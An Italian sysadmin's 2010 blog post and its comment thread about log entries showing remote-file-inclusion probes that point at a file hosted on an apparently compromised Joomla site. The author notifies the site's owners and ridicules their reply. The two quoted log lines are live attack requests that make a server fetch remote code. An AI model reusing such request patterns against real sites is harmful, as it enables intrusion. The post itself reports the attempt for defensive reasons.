Commenti & Opinioni


Home Page | Commenti | Articoli | Faq | Documenti | Ricerca | Archivio | Storie dalla Sala Macchine | Contribuire | Login/Register

Imbecilli...

Un paio di giorni fa, mentre mi stavo dilettando (per certi valori di 'dilettare') a controllare i millemila logs dei nostri sistemi ho scovato una marea di linee come le seguenti:

91.215.157.104 - - [13/Sep/2010:04:02:39 +0200] "GET /about-us//?site=http://www.rcpamanual.edu.au//language/pdf_fonts/id.txt??? HTTP/1.1" 404 13220

91.215.157.104 - - [13/Sep/2010:04:02:39 +0200] "GET //?site=http://www.rcpamanual.edu.au//language/pdf_fonts/id.txt??? HTTP/1.1" 404 13220

Ho quindi inviato una maillina ai manutentori del dominio indicato (rcpamanual.edu.au) informandoli che il loro sistema era probabilmente p0wned.

Ed oggi mi arriva una maillina di risposta che dice:

"lo sviluppatore del sito aggiornera' ad una nuova versione di Joomla che risolve parecchi problemi, ha controllato ed e' sicuro che tale cosa non ha avuto effetti nefasti. Posso sapere come lo avete scoperto?"

Ed io penso, nell'ordine: a) lo sapevo che da c'era di mezzo una PHMerdaccia da qualche parte b) mi sa che il "problema" e' tra le orecchie dello sviluppatroto e c) perche' io sono capace di leggere un fottuto file di log? Perche' se loro controllassero i loro fottuti files di log forse si renderebbero conto che ci sono un bazilliardo di richieste per files che non dovrebbero essere sul loro sistema... O no?

Imbecilli. Altro che CL.

Davide Bianchi
16/09/2010 09:00

 

I commenti sono aggiunti quando e soprattutto se ho il tempo di guardarli e dopo aver eliminato le cagate, spam, tentativi di phishing et similia. Quindi non trattenete il respiro.

9 messaggi this document does not accept new posts
Anonymous Puzzled Di Anonymous Puzzled - postato il 16/09/2010 14:08

però quelle richieste hanno un 404, quindi sono richieste a file che non ci sono...

 

o mi sono perso qualche passaggio?

--
Anonymous Puzzled


Davide Bianchi@ Anonymous Puzzled Di Davide Bianchi - postato il 16/09/2010 15:56

però quelle richieste hanno un 404, quindi sono richieste a file che non ci sono...

il 404 e' dovuto al fatto che il server da cui io ho prelevato il log e' TomCat, pertanto l'URL non viene richiesto. Poi spero che dopo due giorni gli imbecilli di cui sopra abbiano rimosso la fetecchia dal loro sistema, ma non ci giurerei troppo.

--
Davide Bianchi


Nik Di Nik - postato il 16/09/2010 18:32

ma tu gli hai risposto?

e se sì, come?



laugh

--
Chronicles of a Broken Heart


Davide Bianchi@ Nik Di Davide Bianchi - postato il 16/09/2010 19:41

ma tu gli hai risposto?

Ovviamente. Gli ho detto che sarebbe interessante capire come c'e' arrivata quella roba sul loro server e che io leggo i file di logs, tutti i giorni.

--
Davide Bianchi


FMblues Di FMblues - postato il 17/09/2010 13:06

Ciao, sono andato per curiosità sul sito da te indicato.

Nel footer della pagina è indicato da chi è sviluppato il sito, notare il link a cosa porta:

http://www.rcpamanual.edu.au/www.websitesaleslab.com.au

Il problema non è solo che è un php, ma chi lo gestisce non si è manco preso la briga di leggere manuale o guida del suddetto Joomla.

Maurizio

 

--
Tecnico e Responsabile Help Desk


Davide Bianchi@ FMblues Di Davide Bianchi - postato il 18/09/2010 10:56

 problema non è solo che è un php, ma chi lo gestisce

Ma certo che il problema e' anche chi lo gestisce. Ma chi  sa come gestire le cose credi che scelga la solita cagata che tutti scelgono?

--
Davide Bianchi


Nik@ Davide Bianchi Di Nik - postato il 20/09/2010 09:28

 problema non è solo che è un php, ma chi lo gestisce

Ma certo che il problema e' anche chi lo gestisce. 

 

Come si suol dire: "fra la sedia e la tastiera......"

 

 

--
Chronicles of a Broken Heart


Sam Di Sam - postato il 17/09/2010 17:53

Azz... Ti hanno proprio fatto girare, eh?

laughlaughlaugh

E' la prima volta che vedo scrivere al buon D nome e cognome dei personaggi! Ma quando ci vuole... ci vuole!

--
Sam


Rggb Di Rggb - postato il 20/09/2010 09:19

"lo sviluppatore del sito aggiornera' ad una nuova versione di Joomla che risolve parecchi problemi, ha controllato ed e' sicuro che tale cosa non ha avuto effetti nefasti. Posso sapere come lo avete scoperto?"

:)

Ma scusa, potevi anche mandarli un po' nel pallone, tipo "ho un sw di analisi sviluppato in collaborazione di un team di ricerca della UCLA che è in testing anche presso l'ufficio federale investigativo sui crimini informatici USA, che avvisa istantaneamente in caso di segnalazioni sospette"...

--
Rggb


9 messaggi this document does not accept new posts

Precedente Successivo


Il presente sito e' frutto del sudore della mia fronte (e delle mie dita), se siete interessati a ripubblicare uno degli articoli, documenti o qualunque altra cosa presente in questo sito per cortesia datemene comunicazione (o all'autore dell'articolo se non sono io), cosi' il giorno che faccio delle aggiunte potro' avvisarvi e magari mandarvi il testo aggiornato.


Questo sito era composto con VIM, ora e' composto con VIM ed il famosissimo CMS FdT.

Questo sito non e' ottimizzato per la visione con nessun browser particolare, ne' richiede l'uso di font particolari o risoluzioni speciali. Siete liberi di vederlo come vi pare e piace, o come disse qualcuno: "Finalmente uno dei POCHI siti che ancora funzionano con IE5 dentro Windows 3.1".

Web Interoperability Pleadge Support This Project
Powered By Gort